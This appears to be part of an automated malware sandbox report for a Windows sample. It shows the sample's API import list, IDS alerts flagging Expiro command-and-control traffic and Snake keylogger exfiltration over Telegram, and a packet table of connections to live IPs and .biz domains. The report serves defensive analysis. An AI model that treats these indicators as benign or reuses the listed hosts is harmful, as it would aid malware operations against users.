MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-16T14:10:20.041310+0100	2850851	ETPRO MALWARE Win32/Expiro.NDO CnC Activity	1	192.168.2.4	49730	54.244.188.177	80	TCP
2024-12-16T14:10:20.509665+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49731	158.101.44.242	80	TCP
2024-12-16T14:10:23.085656+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	18.141.10.107	80	192.168.2.4	49733	TCP
2024-12-16T14:10:23.085656+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	18.141.10.107	80	192.168.2.4	49733	TCP
2024-12-16T14:10:25.157393+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	54.244.188.177	80	192.168.2.4	49734	TCP
2024-12-16T14:10:25.157393+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	54.244.188.177	80	192.168.2.4	49734	TCP
2024-12-16T14:10:27.074299+0100	2051648	ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)	1	192.168.2.4	55105	1.1.1.1	53	UDP
2024-12-16T14:10:27.185679+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	44.221.84.105	80	192.168.2.4	49735	TCP
2024-12-16T14:10:27.185679+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	44.221.84.105	80	192.168.2.4	49735	TCP
2024-12-16T14:10:28.124938+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49731	158.101.44.242	80	TCP
2024-12-16T14:10:30.375537+0100	2057744	ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram	1	192.168.2.4	49737	149.154.167.220	443	TCP
2024-12-16T14:10:34.503647+0100	2051649	ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)	1	192.168.2.4	53313	1.1.1.1	53	UDP
2024-12-16T14:11:46.431546+0100	2850851	ETPRO MALWARE Win32/Expiro.NDO CnC Activity	1	192.168.2.4	49766	82.112.184.197	80	TCP
2024-12-16T14:12:11.300826+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	47.129.31.212	80	192.168.2.4	49867	TCP
2024-12-16T14:12:11.300826+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	47.129.31.212	80	192.168.2.4	49867	TCP
2024-12-16T14:12:14.072128+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	13.251.16.150	80	192.168.2.4	49873	TCP
2024-12-16T14:12:14.072128+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	13.251.16.150	80	192.168.2.4	49873	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 16, 2024 14:10:18.564707994 CET	49730	80	192.168.2.4	54.244.188.177
Dec 16, 2024 14:10:18.684539080 CET	80	49730	54.244.188.177	192.168.2.4
Dec 16, 2024 14:10:18.687526941 CET	49730	80	192.168.2.4	54.244.188.177
Dec 16, 2024 14:10:18.760102987 CET	49730	80	192.168.2.4	54.244.188.177
Dec 16, 2024 14:10:18.760142088 CET	49730	80	192.168.2.4	54.244.188.177
Dec 16, 2024 14:10:18.766028881 CET	49731	80	192.168.2.4	158.101.44.242
Dec 16, 2024 14:10:18.879798889 CET	80	49730	54.244.188.177	192.168.2.4
Dec 16, 2024 14:10:18.879854918 CET	80	49730	54.244.188.177	192.168.2.4
Dec 16, 2024 14:10:18.885795116 CET	80	49731	158.101.44.242	192.168.2.4
Dec 16, 2024 14:10:18.885871887 CET	49731	80	192.168.2.4	158.101.44.242
Dec 16, 2024 14:10:18.886172056 CET	49731	80	192.168.2.4	158.101.44.242
Dec 16, 2024 14:10:19.005875111 CET	80	49731	158.101.44.242	192.168.2.4
Dec 16, 2024 14:10:20.041053057 CET	80	49730	54.244.188.177	192.168.2.4
Dec 16, 2024 14:10:20.041254997 CET	80	49730	54.244.188.177	192.168.2.4
Dec 16, 2024 14:10:20.041310072 CET	49730	80	192.168.2.4	54.244.188.177
Dec 16, 2024 14:10:20.042082071 CET	49730	80	192.168.2.4	54.244.188.177
Dec 16, 2024 14:10:20.088876009 CET	80	49731	158.101.44.242	192.168.2.4
Dec 16, 2024 14:10:20.094667912 CET	49731	80	192.168.2.4	158.101.44.242
Dec 16, 2024 14:10:20.161751032 CET	80	49730	54.244.188.177	192.168.2.4
Dec 16, 2024 14:10:20.214878082 CET	80	49731	158.101.44.242	192.168.2.4
Dec 16, 2024 14:10:20.468091011 CET	80	49731	158.101.44.242	192.168.2.4
Dec 16, 2024 14:10:20.509665012 CET	49731	80	192.168.2.4	158.101.44.242
Dec 16, 2024 14:10:20.649657011 CET	49732	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:10:20.649703026 CET	443	49732	172.67.177.134	192.168.2.4
Dec 16, 2024 14:10:20.649960041 CET	49732	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:10:20.659054995 CET	49732	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:10:20.659070969 CET	443	49732	172.67.177.134	192.168.2.4
Dec 16, 2024 14:10:20.838481903 CET	49733	80	192.168.2.4	18.141.10.107
Dec 16, 2024 14:10:20.958214045 CET	80	49733	18.141.10.107	192.168.2.4
Dec 16, 2024 14:10:20.958312035 CET	49733	80	192.168.2.4	18.141.10.107
Dec 16, 2024 14:10:20.958446026 CET	49733	80	192.168.2.4	18.141.10.107
Dec 16, 2024 14:10:20.958460093 CET	49733	80	192.168.2.4	18.141.10.107
Dec 16, 2024 14:10:21.078157902 CET	80	49733	18.141.10.107	192.168.2.4
Dec 16, 2024 14:10:21.078236103 CET	80	49733	18.141.10.107	192.168.2.4
Dec 16, 2024 14:10:21.876902103 CET	443	49732	172.67.177.134	192.168.2.4
Dec 16, 2024 14:10:21.876971006 CET	49732	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:10:21.881438971 CET	49732	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:10:21.881453991 CET	443	49732	172.67.177.134	192.168.2.4
Dec 16, 2024 14:10:21.881741047 CET	443	49732	172.67.177.134	192.168.2.4
Dec 16, 2024 14:10:21.931533098 CET	49732	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:10:21.954922915 CET	49732	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:10:21.995332003 CET	443	49732	172.67.177.134	192.168.2.4
Dec 16, 2024 14:10:22.353849888 CET	443	49732	172.67.177.134	192.168.2.4
Dec 16, 2024 14:10:22.353928089 CET	443	49732	172.67.177.134	192.168.2.4
Dec 16, 2024 14:10:22.354038000 CET	49732	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:10:22.393781900 CET	49732	443	192.168.2.4	172.67.177.134
Dec 16, 2024 14:10:22.965517044 CET	80	49733	18.141.10.107	192.168.2.4
Dec 16, 2024 14:10:22.965567112 CET	80	49733	18.141.10.107	192.168.2.4
Dec 16, 2024 14:10:22.965704918 CET	49733	80	192.168.2.4	18.141.10.107
Dec 16, 2024 14:10:22.965742111 CET	49733	80	192.168.2.4	18.141.10.107
Dec 16, 2024 14:10:23.085655928 CET	80	49733	18.141.10.107	192.168.2.4
Dec 16, 2024 14:10:23.564536095 CET	49734	80	192.168.2.4	54.244.188.177
Dec 16, 2024 14:10:23.684482098 CET	80	49734	54.244.188.177	192.168.2.4
Dec 16, 2024 14:10:23.684623003 CET	49734	80	192.168.2.4	54.244.188.177
Dec 16, 2024 14:10:23.685245037 CET	49734	80	192.168.2.4	54.244.188.177
Dec 16, 2024 14:10:23.685316086 CET	49734	80	192.168.2.4	54.244.188.177
Dec 16, 2024 14:10:23.805152893 CET	80	49734	54.244.188.177	192.168.2.4
Dec 16, 2024 14:10:23.805171013 CET	80	49734	54.244.188.177	192.168.2.4
Dec 16, 2024 14:10:25.037020922 CET	80	49734	54.244.188.177	192.168.2.4
Dec 16, 2024 14:10:25.037038088 CET	80	49734	54.244.188.177	192.168.2.4
Dec 16, 2024 14:10:25.037142038 CET	49734	80	192.168.2.4	54.244.188.177
Dec 16, 2024 14:10:25.037345886 CET	49734	80	192.168.2.4	54.244.188.177
Dec 16, 2024 14:10:25.157392979 CET	80	49734	54.244.188.177	192.168.2.4
Dec 16, 2024 14:10:25.847995996 CET	49735	80	192.168.2.4	44.221.84.105
Dec 16, 2024 14:10:25.967796087 CET	80	49735	44.221.84.105	192.168.2.4
Dec 16, 2024 14:10:25.967906952 CET	49735	80	192.168.2.4	44.221.84.105
Dec 16, 2024 14:10:25.968132973 CET	49735	80	192.168.2.4	44.221.84.105
Dec 16, 2024 14:10:25.968163013 CET	49735	80	192.168.2.4	44.221.84.105
Dec 16, 2024 14:10:26.087943077 CET	80	49735	44.221.84.105	192.168.2.4
Dec 16, 2024 14:10:26.087956905 CET	80	49735	44.221.84.105	192.168.2.4
Dec 16, 2024 14:10:27.065583944 CET	80	49735	44.221.84.105	192.168.2.4
Dec 16, 2024 14:10:27.065645933 CET	80	49735	44.221.84.105	192.168.2.4
Dec 16, 2024 14:10:27.065743923 CET	49735	80	192.168.2.4	44.221.84.105
Dec 16, 2024 14:10:27.065787077 CET	49735	80	192.168.2.4	44.221.84.105
Dec 16, 2024 14:10:27.185678959 CET	80	49735	44.221.84.105	192.168.2.4
Dec 16, 2024 14:10:27.687941074 CET	49731	80	192.168.2.4	158.101.44.242
Dec 16, 2024 14:10:27.717106104 CET	49736	80	192.168.2.4	172.234.222.138
Dec 16, 2024 14:10:27.807760000 CET	80	49731	158.101.44.242	192.168.2.4
Dec 16, 2024 14:10:27.837196112 CET	80	49736	172.234.222.138	192.168.2.4
Dec 16, 2024 14:10:27.840693951 CET	49736	80	192.168.2.4	172.234.222.138
Dec 16, 2024 14:10:28.035669088 CET	49736	80	192.168.2.4	172.234.222.138
Dec 16, 2024 14:10:28.035669088 CET	49736	80	192.168.2.4	172.234.222.138
Dec 16, 2024 14:10:28.069758892 CET	80	49731	158.101.44.242	192.168.2.4
Dec 16, 2024 14:10:28.124938011 CET	49731	80	192.168.2.4	158.101.44.242
Dec 16, 2024 14:10:28.155601978 CET	80	49736	172.234.222.138	192.168.2.4
Dec 16, 2024 14:10:28.156291008 CET	80	49736	172.234.222.138	192.168.2.4
Dec 16, 2024 14:10:28.245682001 CET	49737	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:10:28.245712996 CET	443	49737	149.154.167.220	192.168.2.4
Dec 16, 2024 14:10:28.245773077 CET	49737	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:10:28.246264935 CET	49737	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:10:28.246273041 CET	443	49737	149.154.167.220	192.168.2.4
Dec 16, 2024 14:10:28.964426994 CET	80	49736	172.234.222.138	192.168.2.4
Dec 16, 2024 14:10:29.009702921 CET	49736	80	192.168.2.4	172.234.222.138
Dec 16, 2024 14:10:29.302666903 CET	49738	80	192.168.2.4	72.52.179.174
Dec 16, 2024 14:10:29.422538042 CET	80	49738	72.52.179.174	192.168.2.4
Dec 16, 2024 14:10:29.422957897 CET	49738	80	192.168.2.4	72.52.179.174
Dec 16, 2024 14:10:29.423388004 CET	49738	80	192.168.2.4	72.52.179.174
Dec 16, 2024 14:10:29.543482065 CET	80	49738	72.52.179.174	192.168.2.4
Dec 16, 2024 14:10:29.612699986 CET	443	49737	149.154.167.220	192.168.2.4
Dec 16, 2024 14:10:29.612792015 CET	49737	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:10:29.616266012 CET	49737	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:10:29.616283894 CET	443	49737	149.154.167.220	192.168.2.4
Dec 16, 2024 14:10:29.616544962 CET	443	49737	149.154.167.220	192.168.2.4
Dec 16, 2024 14:10:29.618927956 CET	49737	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:10:29.659327030 CET	443	49737	149.154.167.220	192.168.2.4
Dec 16, 2024 14:10:29.659965992 CET	49737	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:10:29.659979105 CET	443	49737	149.154.167.220	192.168.2.4
Dec 16, 2024 14:10:30.375576973 CET	443	49737	149.154.167.220	192.168.2.4
Dec 16, 2024 14:10:30.375678062 CET	443	49737	149.154.167.220	192.168.2.4
Dec 16, 2024 14:10:30.376275063 CET	49737	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:10:30.376406908 CET	49737	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:10:30.593115091 CET	80	49738	72.52.179.174	192.168.2.4
Dec 16, 2024 14:10:30.650337934 CET	49738	80	192.168.2.4	72.52.179.174
Dec 16, 2024 14:10:31.314531088 CET	49739	80	192.168.2.4	76.223.26.96
Dec 16, 2024 14:10:31.435236931 CET	80	49739	76.223.26.96	192.168.2.4
Dec 16, 2024 14:10:31.435422897 CET	49739	80	192.168.2.4	76.223.26.96
Dec 16, 2024 14:10:31.435611010 CET	49739	80	192.168.2.4	76.223.26.96
Dec 16, 2024 14:10:31.555386066 CET	80	49739	76.223.26.96	192.168.2.4
Dec 16, 2024 14:10:32.772351027 CET	80	49739	76.223.26.96	192.168.2.4
Dec 16, 2024 14:10:32.772660017 CET	80	49739	76.223.26.96	192.168.2.4
Dec 16, 2024 14:10:32.772727013 CET	49739	80	192.168.2.4	76.223.26.96
Dec 16, 2024 14:10:32.772749901 CET	80	49739	76.223.26.96	192.168.2.4
Dec 16, 2024 14:10:32.772763968 CET	80	49739	76.223.26.96	192.168.2.4
Dec 16, 2024 14:10:32.772882938 CET	80	49739	76.223.26.96	192.168.2.4
Dec 16, 2024 14:10:32.772896051 CET	80	49739	76.223.26.96	192.168.2.4
Dec 16, 2024 14:10:32.772907972 CET	80	49739	76.223.26.96	192.168.2.4
Dec 16, 2024 14:10:32.772921085 CET	80	49739	76.223.26.96	192.168.2.4
Dec 16, 2024 14:10:32.772927046 CET	49739	80	192.168.2.4	76.223.26.96
Dec 16, 2024 14:10:32.772948027 CET	49739	80	192.168.2.4	76.223.26.96
Dec 16, 2024 14:10:32.772969007 CET	49739	80	192.168.2.4	76.223.26.96
Dec 16, 2024 14:10:32.773150921 CET	80	49739	76.223.26.96	192.168.2.4
Dec 16, 2024 14:10:32.773164034 CET	80	49739	76.223.26.96	192.168.2.4
Dec 16, 2024 14:10:32.773206949 CET	49739	80	192.168.2.4	76.223.26.96
Dec 16, 2024 14:10:32.893018961 CET	80	49739	76.223.26.96	192.168.2.4
Dec 16, 2024 14:10:32.893035889 CET	80	49739	76.223.26.96	192.168.2.4
Dec 16, 2024 14:10:32.893124104 CET	49739	80	192.168.2.4	76.223.26.96
Dec 16, 2024 14:10:32.964778900 CET	80	49739	76.223.26.96	192.168.2.4
Dec 16, 2024 14:10:32.964828968 CET	80	49739	76.223.26.96	192.168.2.4
Dec 16, 2024 14:10:32.964911938 CET	49739	80	192.168.2.4	76.223.26.96
Dec 16, 2024 14:10:32.968852043 CET	80	49739	76.223.26.96	192.168.2.4
Dec 16, 2024 14:10:32.995321989 CET	49736	80	192.168.2.4	172.234.222.138
Dec 16, 2024 14:10:32.995398045 CET	49736	80	192.168.2.4	172.234.222.138
Dec 16, 2024 14:10:33.009707928 CET	49739	80	192.168.2.4	76.223.26.96
Dec 16, 2024 14:10:33.115232944 CET	80	49736	172.234.222.138	192.168.2.4
Dec 16, 2024 14:10:33.115263939 CET	80	49736	172.234.222.138	192.168.2.4
Dec 16, 2024 14:10:33.331868887 CET	80	49736	172.234.222.138	192.168.2.4
Dec 16, 2024 14:10:33.333394051 CET	49738	80	192.168.2.4	72.52.179.174
Dec 16, 2024 14:10:33.384818077 CET	49736	80	192.168.2.4	172.234.222.138
Dec 16, 2024 14:10:33.453651905 CET	80	49738	72.52.179.174	192.168.2.4
Dec 16, 2024 14:10:33.707448959 CET	80	49738	72.52.179.174	192.168.2.4
Dec 16, 2024 14:10:33.722455025 CET	49739	80	192.168.2.4	76.223.26.96
Dec 16, 2024 14:10:33.759716034 CET	49738	80	192.168.2.4	72.52.179.174
Dec 16, 2024 14:10:33.842439890 CET	80	49739	76.223.26.96	192.168.2.4
Dec 16, 2024 14:10:34.206362009 CET	80	49739	76.223.26.96	192.168.2.4
Dec 16, 2024 14:10:34.207750082 CET	80	49739	76.223.26.96	192.168.2.4
Dec 16, 2024 14:10:34.207786083 CET	80	49739	76.223.26.96	192.168.2.4
Dec 16, 2024 14:10:34.207858086 CET	49739	80	192.168.2.4	76.223.26.96
Dec 16, 2024 14:10:34.216240883 CET	80	49739	76.223.26.96	192.168.2.4
Dec 16, 2024 14:10:34.216279030 CET	80	49739	76.223.26.96	192.168.2.4
Dec 16, 2024 14:10:34.216310024 CET	49739	80	192.168.2.4	76.223.26.96
Dec 16, 2024 14:10:34.221673012 CET	80	49739	76.223.26.96	192.168.2.4
Dec 16, 2024 14:10:34.221745014 CET	80	49739	76.223.26.96	192.168.2.4
Dec 16, 2024 14:10:34.221987963 CET	49739	80	192.168.2.4	76.223.26.96
Dec 16, 2024 14:10:34.230150938 CET	80	49739	76.223.26.96	192.168.2.4
Dec 16, 2024 14:10:34.230170012 CET	80	49739	76.223.26.96	192.168.2.4
Dec 16, 2024 14:10:34.230566978 CET	49739	80	192.168.2.4	76.223.26.96
Dec 16, 2024 14:10:34.238523006 CET	80	49739	76.223.26.96	192.168.2.4
Dec 16, 2024 14:10:34.238584995 CET	49739	80	192.168.2.4	76.223.26.96
Dec 16, 2024 14:10:34.239500999 CET	80	49739	76.223.26.96	192.168.2.4
Dec 16, 2024 14:10:34.247009039 CET	80	49739	76.223.26.96	192.168.2.4
Dec 16, 2024 14:10:34.247246981 CET	80	49739	76.223.26.96	192.168.2.4
Dec 16, 2024 14:10:34.247282028 CET	49739	80	192.168.2.4	76.223.26.96
Dec 16, 2024 14:10:34.255249023 CET	80	49739	76.223.26.96	192.168.2.4
Dec 16, 2024 14:10:34.255366087 CET	49739	80	192.168.2.4	76.223.26.96
Dec 16, 2024 14:10:34.255371094 CET	80	49739	76.223.26.96	192.168.2.4
Dec 16, 2024 14:10:34.306664944 CET	49739	80	192.168.2.4	76.223.26.96
Dec 16, 2024 14:10:35.107353926 CET	49741	80	192.168.2.4	18.141.10.107
Dec 16, 2024 14:10:35.227464914 CET	80	49741	18.141.10.107	192.168.2.4
Dec 16, 2024 14:10:35.227560997 CET	49741	80	192.168.2.4	18.141.10.107
Dec 16, 2024 14:10:35.227845907 CET	49741	80	192.168.2.4	18.141.10.107
Dec 16, 2024 14:10:35.227868080 CET	49741	80	192.168.2.4	18.141.10.107
Dec 16, 2024 14:10:35.347702026 CET	80	49741	18.141.10.107	192.168.2.4
Dec 16, 2024 14:10:35.347718954 CET	80	49741	18.141.10.107	192.168.2.4
Dec 16, 2024 14:10:37.233135939 CET	80	49741	18.141.10.107	192.168.2.4
Dec 16, 2024 14:10:37.233174086 CET	80	49741	18.141.10.107	192.168.2.4
Dec 16, 2024 14:10:37.233232975 CET	49741	80	192.168.2.4	18.141.10.107
Dec 16, 2024 14:10:37.236952066 CET	49741	80	192.168.2.4	18.141.10.107
Dec 16, 2024 14:10:37.356884956 CET	80	49741	18.141.10.107	192.168.2.4
Dec 16, 2024 14:10:38.805296898 CET	49745	80	192.168.2.4	82.112.184.197
Dec 16, 2024 14:10:38.925117016 CET	80	49745	82.112.184.197	192.168.2.4
Dec 16, 2024 14:10:38.927400112 CET	49745	80	192.168.2.4	82.112.184.197
Dec 16, 2024 14:10:38.931471109 CET	49745	80	192.168.2.4	82.112.184.197
Dec 16, 2024 14:10:38.931513071 CET	49745	80	192.168.2.4	82.112.184.197
Dec 16, 2024 14:10:39.051383018 CET	80	49745	82.112.184.197	192.168.2.4
Dec 16, 2024 14:10:39.051397085 CET	80	49745	82.112.184.197	192.168.2.4
Dec 16, 2024 14:11:00.838785887 CET	80	49745	82.112.184.197	192.168.2.4
Dec 16, 2024 14:11:00.838861942 CET	49745	80	192.168.2.4	82.112.184.197
Dec 16, 2024 14:11:00.838979006 CET	49745	80	192.168.2.4	82.112.184.197
